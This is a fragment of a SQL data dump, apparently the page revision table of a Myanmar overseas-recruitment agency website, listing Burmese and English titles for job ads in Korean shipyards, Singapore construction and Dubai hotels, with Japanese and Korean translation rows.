(9, 15, 'en', 1, 1, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1687241497, 1687242008, 0, 0, 1, 1, 'und', 0),
(10, 16, 'en', 1, 1, 'ကိုရီးယားသင်္ဘောကျင်းတွင် Electrical Engineer ဖြင့် အလုပ်သွားရောက် အလုပ်လုပ်ကိုင်ချင်သော ကျွမ်းကျင် အင်ဂျင်နီယာများ အမြန်အလိုရှိပါသည်။', 1687265813, 1687265901, 0, 0, 1, 1, 'und', 0),
(11, 17, 'en', 1, 1, 'Contact Us', 1687305757, 1687305974, 0, 0, 1, 1, 'und', 0),
(11, 18, 'en', 1, 1, 'Contact Us', 1687305757, 1687306034, 0, 0, 1, 1, 'und', 0),
(11, 19, 'en', 1, 1, 'Contact Us', 1687305757, 1687306080, 0, 0, 1, 1, 'und', 0),
(11, 20, 'en', 1, 1, 'Contact Us', 1687305757, 1687306114, 0, 0, 1, 1, 'und', 0),
(6, 21, 'en', 1, 1, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော်စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်းပြောကြား', 1687240083, 1687311319, 0, 0, 1, 1, 'und', 0),
(5, 22, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေးလုပ်ငန်းတွင် General Worker ဖြင့် အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန်အလိုရှိပါတယ်။', 1687238451, 1687311438, 0, 0, 1, 1, 'und', 0),
(8, 23, 'en', 1, 1, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1687240986, 1687311856, 0, 0, 1, 1, 'und', 0),
(6, 24, 'en', 1, 1, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1687240083, 1687311876, 0, 0, 1, 1, 'und', 0),
(5, 25, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေး လုပ်ငန်းတွင် General Worker ဖြင့် အလုပ်သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန် အလိုရှိပါတယ်။', 1687238451, 1687312455, 0, 0, 1, 1, 'und', 0),
(5, 26, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေး လုပ်ငန်းတွင် General Worker ဖြင့် အလုပ် သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန် အလိုရှိပါတယ်။', 1687238451, 1687312526, 0, 0, 1, 1, 'und', 0),
(1, 27, 'en', 1, 1, 'About Us', 1687235565, 1687405407, 0, 0, 1, 1, 'und', 0),
(5, 28, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေး လုပ်ငန်းတွင် General Worker ဖြင့် အလုပ် သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန် အလိုရှိပါတယ်။', 1687238451, 1687407416, 0, 0, 1, 1, 'und', 0),
(10, 29, 'en', 1, 1, 'ကိုရီးယားသင်္ဘောကျင်းတွင် Electrical Engineer ဖြင့် အလုပ်သွားရောက် အလုပ်လုပ်ကိုင်ချင်သော ကျွမ်းကျင် အင်ဂျင်နီယာများ အမြန်အလိုရှိပါသည်။', 1687265813, 1687407521, 0, 0, 1, 1, 'und', 0),
(4, 30, 'en', 1, 1, 'ကိုရီ', 1687238298, 1687407693, 0, 0, 1, 1, 'und', 0),
(4, 31, 'en', 1, 1, 'အမြန်အလိုရှိပါတယ်', 1687238298, 1687407712, 0, 0, 1, 1, 'und', 0),
(4, 32, 'en', 1, 1, 'အမြန်အလိုရှိပါတယ်', 1687238298, 1687407765, 0, 0, 1, 1, 'und', 0),
(6, 33, 'en', 1, 1, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1687240083, 1687408012, 0, 0, 1, 1, 'und', 0),
(9, 34, 'en', 1, 1, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1687241497, 1687408077, 0, 0, 1, 1, 'und', 0),
(10, 35, 'en', 1, 1, 'ကိုရီးယားသင်္ဘောကျင်းတွင် Electrical Engineer ဖြင့် အလုပ်သွားရောက် အလုပ်လုပ်ကိုင်ချင်သော ကျွမ်းကျင် အင်ဂျင်နီယာများ အမြန်အလိုရှိပါသည်။', 1687265813, 1687408168, 0, 0, 1, 1, 'und', 0),
(10, 36, 'en', 1, 1, 'ကိုရီးယားသင်္ဘောကျင်းတွင် Electrical Engineer ဖြင့် အလုပ်သွားရောက် အလုပ်လုပ်ကိုင်ချင်သော ကျွမ်းကျင် အင်ဂျင်နီယာများ အမြန်အလိုရှိပါသည်။', 1687265813, 1687408217, 0, 0, 1, NULL, 'und', 0),
(5, 37, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေး လုပ်ငန်းတွင် General Worker ဖြင့် အလုပ် သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန် အလိုရှိပါတယ်။', 1687238451, 1687408278, 0, 0, 1, 1, 'und', 0),
(3, 38, 'en', 1, 1, 'E7-3ဝရိန်သင်တန်းကို ဘယ်လိုလူမျိုးတွေတက်သင့်လဲ?', 1687238109, 1687408504, 0, 0, 1, 1, 'und', 0),
(4, 39, 'en', 1, 1, 'အမြန်အလိုရှိပါတယ်', 1687238298, 1687418978, 0, 0, 1, 1, 'und', 0),
(4, 40, 'en', 1, 1, 'အမြန်အလိုရှိပါတယ်', 1687238298, 1687419568, 0, 0, 1, 1, 'und', 0),
(3, 41, 'en', 1, 1, 'E7-3ဝရိန်သင်တန်းကို ဘယ်လိုလူမျိုးတွေတက်သင့်လဲ?', 1687238109, 1687421050, 0, 0, 1, 1, 'und', 0),
(5, 42, 'en', 1, 1, 'စင်္ကာပူနိုင်ငံရှိ ဆောက်လုပ်ရေး လုပ်ငန်းတွင် General Worker ဖြင့် အလုပ် သွားလုပ်ချင်သော Passport အဆင်သင့်ရှိသော ၀န်ထမ်း (၅)ဦး အမြန် အလိုရှိပါတယ်။', 1687238451, 1687421298, 0, 0, 1, 1, 'und', 0),
(10, 43, 'en', 1, 1, 'ကိုရီးယားသင်္ဘောကျင်းတွင် Electrical Engineer ဖြင့် အလုပ်သွားရောက် အလုပ်လုပ်ကိုင်ချင်သော ကျွမ်းကျင် အင်ဂျင်နီယာများ အမြန်အလိုရှိပါသည်။', 1687265813, 1687421314, 0, 0, 1, 1, 'und', 0),
(9, 44, 'en', 1, 1, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1687241497, 1687421347, 0, 0, 1, 1, 'und', 0),
(6, 45, 'en', 1, 1, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1687240083, 1687421361, 0, 0, 1, 1, 'und', 0),
(7, 46, 'en', 1, 1, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1687240759, 1687421814, 0, 0, 1, 1, 'und', 0),
(1, 47, 'en', 1, 1, 'About Us', 1687235565, 1688183617, 0, 0, 1, 1, 'und', 0),
(1, 48, 'en', 1, 1, 'About Us', 1687235565, 1688183685, 0, 0, 1, 1, 'und', 0),
(4, 49, 'en', 1, 1, 'အမြန်အလိုရှိပါတယ်', 1687238298, 1688183951, 0, 0, 1, 1, 'und', 0),
(1, 54, 'en', 1, 1, 'About Us', 1687235565, 1688185230, 0, 0, 1, NULL, 'und', 0),
(11, 55, 'en', 1, 1, 'Contact Us', 1687305757, 1688185257, 0, 0, 1, 1, 'und', 0),
(17, 57, 'en', 1, 1, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688194656, 1688195344, 0, 0, 1, 1, 'und', 0),
(17, 58, 'en', 1, 1, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688194656, 1688195504, 0, 0, 1, 1, 'und', 0),
(18, 59, 'en', 1, 1, 'Food&Beverage Hostess, (Dubai or Abu dhabi ရှိကြယ်ငါးပွင့်ဟိုတယ်တွင်တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်', 1688195851, 1688195992, 0, 0, 1, 1, 'und', 0),
(18, 60, 'en', 1, 1, 'Food&Beverage Hostess, (Dubai or Abu dhabi ရှိကြယ်ငါးပွင့်ဟိုတယ်တွင်တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်', 1688195851, 1688196445, 0, 0, 1, 1, 'und', 0),
(18, 61, 'en', 1, 1, 'Food&Beverage Hostess, (Dubai or Abu dhabi ရှိကြယ်ငါးပွင့်ဟိုတယ်တွင်တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်', 1688195851, 1688196549, 0, 0, 1, 1, 'und', 0),
(9, 62, 'en', 1, 1, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1687241497, 1688199484, 0, 0, 1, 1, 'und', 0),
(11, 63, 'en', 1, 1, 'Contact Us', 1687305757, 1688199790, 0, 0, 1, 1, 'und', 0),
(1, 64, 'en', 1, 1, 'About Us', 1687235565, 1688200464, 0, 0, 1, 1, 'und', 0),
(19, 65, 'en', 1, 1, 'ကိုရီယားနိူင်ငံသို့ဂဟေဆော်ကျွမ်းကျင်( E 7-3 ) Visa ဖြင့် သွားရောက်မည့်သူများမှ KOSHIPA SKILL TESTဖြေဆိုရန် စာရင်းလာရောက်ပေးသွင်းကြသူများ ပထမအသုတ်(၆၀)ယောက်ကျော်', 1688200678, 1688201010, 0, 0, 1, 1, 'und', 0),
(20, 66, 'en', 1, 1, 'အပတ်စဉ်(၂)ဒုတိယအသုတ်ဂဟေဆော်သင်တန်းသားများအမှတ်တရ', 1688204366, 1688204471, 0, 0, 1, 1, 'und', 0),
(1, 67, 'en', 1, 1, 'About Us', 1687235565, 1688211096, 0, 0, 1, 1, 'und', 0),
(1, 68, 'en', 1, 1, 'About Us', 1687235565, 1688353597, 0, 0, 1, 1, 'und', 0),
(1, 69, 'en', 1, 1, 'About Us', 1687235565, 1688353960, 0, 0, 1, 1, 'und', 0),
(1, 70, 'en', 1, 1, 'About Us', 1687235565, 1688360550, 0, 0, 1, 1, 'und', 0),
(18, 71, 'en', 1, 1, 'Food&Beverage Hostess, (Dubai or Abu dhabi ရှိကြယ်ငါးပွင့်ဟိုတယ်တွင်တာဝန်ထမ်းဆောင်ရန် )အမြန်အလိုရှိသည်', 1688195851, 1688361046, 0, 0, 1, 1, 'und', 0),
(10, 72, 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, 1, 'und', 0),
(18, 73, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688361941, 0, 0, 1, 1, 'und', 0),
(18, 74, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, 1, 'und', 0),
(4, 75, 'en', 1, 1, 'Wanted Desperately', 1687238298, 1688363483, 0, 0, 1, 1, 'und', 0),
(5, 76, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688364918, 0, 0, 1, 1, 'und', 0),
(5, 77, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365050, 0, 0, 1, 1, 'und', 0),
(5, 78, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, 1, 'und', 0),
(11, 79, 'en', 1, 1, 'Contact Us', 1687305757, 1688370916, 0, 0, 1, 1, 'und', 0),
(3, 80, 'en', 1, 1, 'Who should attend E 7-3 Welding Class?', 1687238109, 1688376697, 0, 0, 1, 1, 'und', 0),
(3, 81, 'en', 1, 1, 'Who should attend E 7-3 Welding Class?', 1687238109, 1688376793, 0, 0, 1, 1, 'und', 0),
(3, 82, 'en', 1, 1, 'Who should attend E 7-3 Welding Class?', 1687238109, 1688376827, 0, 0, 1, 1, 'und', 0),
(1, 83, 'en', 1, 1, 'About Us', 1687235565, 1688376966, 0, 0, 1, 1, 'und', 0),
(20, 84, 'en', 1, 1, 'Memorial Photo of 2nd Batch Welding Students', 1688204366, 1688377233, 0, 0, 1, 1, 'und', 0),
(19, 85, 'en', 1, 1, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688200678, 1688377651, 0, 0, 1, 1, 'und', 0),
(1, 86, 'en', 1, 1, 'About Us', 1687235565, 1688376966, 0, 0, 1, NULL, 'und', 0),
(1, 86, 'ja', 1, 2, 'About Us', 1688382532, 1688382547, 0, 0, 0, 1, 'en', 0),
(1, 87, 'en', 1, 1, 'About Us', 1687235565, 1688376966, 0, 0, 1, NULL, 'und', 0),
(1, 87, 'ja', 1, 2, 'About Us', 1688382532, 1688382686, 0, 0, 0, 1, 'en', 0),
(1, 88, 'en', 1, 1, 'About Us', 1687235565, 1688376966, 0, 0, 1, NULL, 'und', 0),
(1, 88, 'ja', 1, 2, 'About Us', 1688382532, 1688382686, 0, 0, 0, NULL, 'en', 0),
(1, 88, 'ko', 1, 2, 'About Us', 1688382695, 1688382713, 0, 0, 0, 1, 'en', 0),
(11, 89, 'en', 1, 1, 'Contact Us', 1687305757, 1688370916, 0, 0, 1, NULL, 'und', 0),
(11, 89, 'ja', 1, 2, 'Contact Us', 1688383131, 1688383134, 0, 0, 0, 1, 'en', 0),
(11, 90, 'en', 1, 1, 'Contact Us', 1687305757, 1688370916, 0, 0, 1, NULL, 'und', 0),
(11, 90, 'ja', 1, 2, 'Contact Us', 1688383131, 1688383134, 0, 0, 0, NULL, 'en', 0),
(11, 90, 'ko', 1, 2, 'Contact Us', 1688383142, 1688383148, 0, 0, 0, 1, 'en', 0),
(21, 91, 'en', 1, 2, 'slider1', 1688383642, 1688383668, 0, 0, 1, 1, 'und', 0),
(22, 92, 'en', 1, 2, 'slider2', 1688383679, 1688383690, 0, 0, 1, 1, 'und', 0),
(23, 93, 'en', 1, 2, 'Company Profile', 1688384143, 1688384170, 0, 0, 1, 1, 'und', 0),
(23, 94, 'en', 1, 2, 'Company Profile', 1688384143, 1688384170, 0, 0, 1, NULL, 'und', 0),
(23, 94, 'ja', 1, 2, 'Company Profile', 1688384224, 1688384228, 0, 0, 0, 1, 'en', 0),
(23, 95, 'en', 1, 2, 'Company Profile', 1688384143, 1688384170, 0, 0, 1, NULL, 'und', 0),
(23, 95, 'ja', 1, 2, 'Company Profile', 1688384224, 1688384228, 0, 0, 0, NULL, 'en', 0),
(23, 95, 'ko', 1, 2, 'Company Profile', 1688384243, 1688384247, 0, 0, 0, 1, 'en', 0),
(24, 96, 'en', 1, 2, 'Our Services', 1688384288, 1688384298, 0, 0, 1, 1, 'und', 0),
(24, 97, 'en', 1, 2, 'Our Services', 1688384288, 1688384298, 0, 0, 1, NULL, 'und', 0),
(24, 97, 'ja', 1, 2, 'Our Services', 1688384311, 1688384315, 0, 0, 0, 1, 'en', 0),
(23, 98, 'en', 1, 2, 'Company Profile', 1688384143, 1688384170, 0, 0, 1, NULL, 'und', 0),
(23, 98, 'ja', 1, 2, 'Company Profile', 1688384224, 1688384228, 0, 0, 0, NULL, 'en', 0),
(23, 98, 'ko', 1, 2, 'Company Profile', 1688384243, 1688384343, 0, 0, 0, NULL, 'en', 0),
(25, 99, 'en', 1, 2, 'Mission & Vision', 1688384376, 1688384384, 0, 0, 1, 1, 'und', 0),
(25, 100, 'en', 1, 2, 'Mission & Vision', 1688384376, 1688384384, 0, 0, 1, NULL, 'und', 0),
(25, 100, 'ja', 1, 2, 'Mission & Vision', 1688384401, 1688384403, 0, 0, 0, 1, 'en', 0),
(25, 101, 'en', 1, 2, 'Mission & Vision', 1688384376, 1688384384, 0, 0, 1, NULL, 'und', 0),
(25, 101, 'ja', 1, 2, 'Mission & Vision', 1688384401, 1688384403, 0, 0, 0, NULL, 'en', 0),
(25, 101, 'ko', 1, 2, 'Mission & Vision', 1688384459, 1688384462, 0, 0, 0, 1, 'en', 0),
(26, 102, 'en', 1, 2, 'Future Goal', 1688384477, 1688384486, 0, 0, 1, 1, 'und', 0),
(26, 103, 'en', 1, 2, 'Future Goal', 1688384477, 1688384486, 0, 0, 1, NULL, 'und', 0),
(26, 103, 'ja', 1, 2, 'Future Goal', 1688384504, 1688384515, 0, 0, 0, 1, 'en', 0),
(26, 104, 'en', 1, 2, 'Future Goal', 1688384477, 1688384486, 0, 0, 1, NULL, 'und', 0),
(26, 104, 'ja', 1, 2, 'Future Goal', 1688384504, 1688384515, 0, 0, 0, NULL, 'en', 0),
(26, 104, 'ko', 1, 2, 'Future Goal', 1688384529, 1688384543, 0, 0, 0, 1, 'en', 0),
(27, 105, 'en', 1, 2, 'Company History', 1688384566, 1688384574, 0, 0, 1, 1, 'und', 0),
(27, 106, 'en', 1, 2, 'Company History', 1688384566, 1688384574, 0, 0, 1, NULL, 'und', 0),
(27, 106, 'ja', 1, 2, 'Company History', 1688384583, 1688384590, 0, 0, 0, 1, 'en', 0),
(27, 107, 'en', 1, 2, 'Company History', 1688384566, 1688384574, 0, 0, 1, NULL, 'und', 0),
(27, 107, 'ja', 1, 2, 'Company History', 1688384583, 1688384590, 0, 0, 0, NULL, 'en', 0),
(27, 107, 'ko', 1, 2, 'Company History', 1688384601, 1688384605, 0, 0, 0, 1, 'en', 0),
(23, 108, 'en', 1, 2, 'Company Profile', 1688384143, 1688384170, 0, 0, 1, NULL, 'und', 0),
(23, 108, 'ja', 1, 2, 'Company Profile', 1688384224, 1688384708, 0, 0, 0, 1, 'en', 0),
(23, 108, 'ko', 1, 2, 'Company Profile', 1688384243, 1688384343, 0, 0, 0, NULL, 'en', 0),
(23, 109, 'en', 1, 2, 'Company Profile', 1688384143, 1688384170, 0, 0, 1, NULL, 'und', 0),
(23, 109, 'ja', 1, 2, 'Company Profile', 1688384224, 1688384708, 0, 0, 0, NULL, 'en', 0),
(23, 109, 'ko', 1, 2, 'Company Profile', 1688384243, 1688384717, 0, 0, 0, 1, 'en', 0),
(8, 110, 'en', 1, 1, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1687240986, 1687311856, 0, 0, 1, NULL, 'und', 0),
(8, 110, 'ja', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388288, 1688388291, 0, 0, 0, 1, 'en', 0),
(8, 111, 'en', 1, 1, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1687240986, 1687311856, 0, 0, 1, NULL, 'und', 0),
(8, 111, 'ja', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388288, 1688388291, 0, 0, 0, NULL, 'en', 0),
(8, 111, 'ko', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388296, 1688388301, 0, 0, 0, 1, 'en', 0),
(8, 112, 'en', 1, 1, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1687240986, 1687311856, 0, 0, 1, NULL, 'und', 0),
(8, 112, 'ja', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388288, 1688388291, 0, 0, 0, NULL, 'en', 0),
(8, 112, 'ko', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388296, 1688388317, 0, 0, 0, 1, 'en', 0),
(8, 113, 'en', 1, 1, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1687240986, 1687311856, 0, 0, 1, NULL, 'und', 0),
(8, 113, 'ja', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388288, 1688388291, 0, 0, 0, NULL, 'en', 0),
(8, 113, 'ko', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388296, 1688388390, 0, 0, 0, 1, 'en', 0),
(8, 114, 'en', 1, 1, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1687240986, 1687311856, 0, 0, 1, NULL, 'und', 0),
(8, 114, 'ja', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388288, 1688388291, 0, 0, 0, NULL, 'en', 0),
(8, 114, 'ko', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388296, 1688388422, 0, 0, 0, 1, 'en', 0),
(6, 115, 'en', 1, 1, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1687240083, 1687421361, 0, 0, 1, NULL, 'und', 0),
(6, 115, 'ja', 1, 2, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1688388644, 1688388648, 0, 0, 0, 1, 'en', 0),
(6, 116, 'en', 1, 1, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1687240083, 1687421361, 0, 0, 1, NULL, 'und', 0),
(6, 116, 'ja', 1, 2, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1688388644, 1688388648, 0, 0, 0, NULL, 'en', 0),
(6, 116, 'ko', 1, 2, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1688388653, 1688388655, 0, 0, 0, 1, 'en', 0),
(7, 117, 'en', 1, 1, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1687240759, 1687421814, 0, 0, 1, NULL, 'und', 0),
(7, 117, 'ja', 1, 2, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1688388674, 1688388678, 0, 0, 0, 1, 'en', 0),
(7, 118, 'en', 1, 1, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1687240759, 1687421814, 0, 0, 1, NULL, 'und', 0),
(7, 118, 'ja', 1, 2, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1688388674, 1688388678, 0, 0, 0, NULL, 'en', 0),
(7, 118, 'ko', 1, 2, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1688388683, 1688388689, 0, 0, 0, 1, 'en', 0),
